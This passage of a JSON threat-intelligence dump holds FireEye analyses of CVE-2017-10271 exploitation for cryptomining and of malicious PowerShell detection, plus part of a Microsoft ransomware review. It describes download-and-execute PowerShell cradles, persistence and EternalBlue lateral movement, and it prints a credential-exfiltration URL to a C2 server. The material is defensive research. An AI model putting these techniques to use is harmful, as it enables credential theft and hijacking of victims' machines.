We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T16:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques\nUsed Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T16:30:00", "id": "FIREEYE:57B0F10A16E18DC672833B1812005B76", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. 
Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. 
The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. 
\n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether it\u2019s running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. 
This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware on remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if it\u2019s vulnerable to EternalBlue, and uses the exploit to spread to that host.\n\nAfter all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. 
We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their reach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name**\n---\nPOWERSHELL DOWNLOADER (METHODOLOGY)\nMONERO MINER (METHODOLOGY)\nMIMIKATZ (CREDENTIAL STEALER)\n\n#### Indicators of Compromise\n\n**MD5** | **Name**\n---|---\n3421A769308D39D4E9C7E8CAECAF7FC4 | cranberry.exe/logic.exe\nB3A831BFA590274902C77B6C7D4C31AE | xmrig.exe/yam.exe\n26404FEDE71F3F713175A3A3CEBC619B | 1.ps1\nD3D10FAA69A10AC754E3B7DDE9178C22 | 2.ps1\n9C91B5CF6ECED54ABB82D1050C5893F2 | info3.ps1\n3AAD3FABF29F9DF65DCBD0F308FF0FA8 | info6.ps1\n933633F2ACFC5909C83F5C73B6FC97CC | lower.css\nB47DAF937897043745DF81F32B9D7565 | lib.css\n3542AC729035C0F3DB186DDF2178B6A0 | bootstrap.css\n\nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T11:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T11:30:00", "id": "FIREEYE:399092589F455855881447C60B56C21A", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. 
This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. 
More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? 
Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. 
The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for Detecting Malicious PowerShell\n\nCan we use machine learning to predict if a PowerShell command is malicious?\n\nOne advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.\n\nAfter we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.\n\nOne of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, \u201cNOL\u201d, \u201cNOLO\u201d, and \u201cNOLOGO\u201d have identical semantics in PowerShell syntax. 
In NLP, a [stemming](<https://en.wikipedia.org/wiki/Stemming>) algorithm will reduce the word to its original form, such as \u201cInnovating\u201d being stemmed to \u201cInnovate\u201d.\n\nWe created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a [trie](<https://en.wikipedia.org/wiki/Trie>), as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.\n\n \nFigure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)\n\nThe overall NLP pipeline we developed is captured in the following table:\n\n**NLP Key Modules** | **Functionality**\n---|---\nDecoder | Detect and decode any encoded text\nNamed Entity Recognition (NER) | Detect and recognize entities such as IP, URL, email, registry key, etc.\nTokenizer | Tokenize the PowerShell command into a list of tokens\nStemmer | Stem tokens into a semantically identical token (uses the trie)\nVocabulary Vectorizer | Vectorize the list of tokens into a machine learning friendly format\nSupervised classifier | Binary classification algorithms: Kernel Support Vector Machine, Gradient Boosted Trees, Deep Neural Networks\nReasoning | The explanation of why the prediction was made. Enables analysts to validate predictions. 
\n\nThe following are the key steps when streaming the aforementioned example through the NLP pipeline:\n\n * Detect and decode the Base64 commands, if any\n * Recognize entities using Named Entity Recognition (NER), such as the <URL>\n * Tokenize the entire text, including both clear text and obfuscated commands\n * Stem each token, and vectorize them based on the vocabulary\n * Predict the malicious probability using the supervised learning model\n\n \nFigure 6: NLP pipeline that predicts the malicious probability of a PowerShell command\n\nMore importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.\n\n \nFigure 7: End-to-end machine learning production pipeline for PowerShell machine learning\n\n#### Value Validated in the Field\n\nWe successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:\n\n * Commodity malware such as Kovter.\n * Red team penetration test activities.\n * New variants that bypassed legacy signatures, while detected by our machine learning with high probabilistic confidence.\n\nThe unique values brought by the PowerShell machine learning detection engine include: \n\n * The machine learning model automatically learns the malicious patterns from the curated corpus. 
In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.\n * The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.\n\nThe ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.\n\n#### Acknowledgements\n\nWe would like to acknowledge:\n\n * Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.\n * Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.\n * Research endpoint support from Caleb Madrigal.\n * The FireEye ICE-DS Team.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T12:00:00", "type": "fireeye", "title": "Malicious PowerShell Detection via Machine Learning", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-07-10T12:00:00", "id": 
"FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "href": "https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "mmpc": [{"lastseen": "2017-09-08T08:23:33", "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n\n\n_Figure 1. 
Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. 
Initial versions targeted Russia and featured a ransom note in the local language. It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). 
The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. 
[Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. 
They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions open across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. 
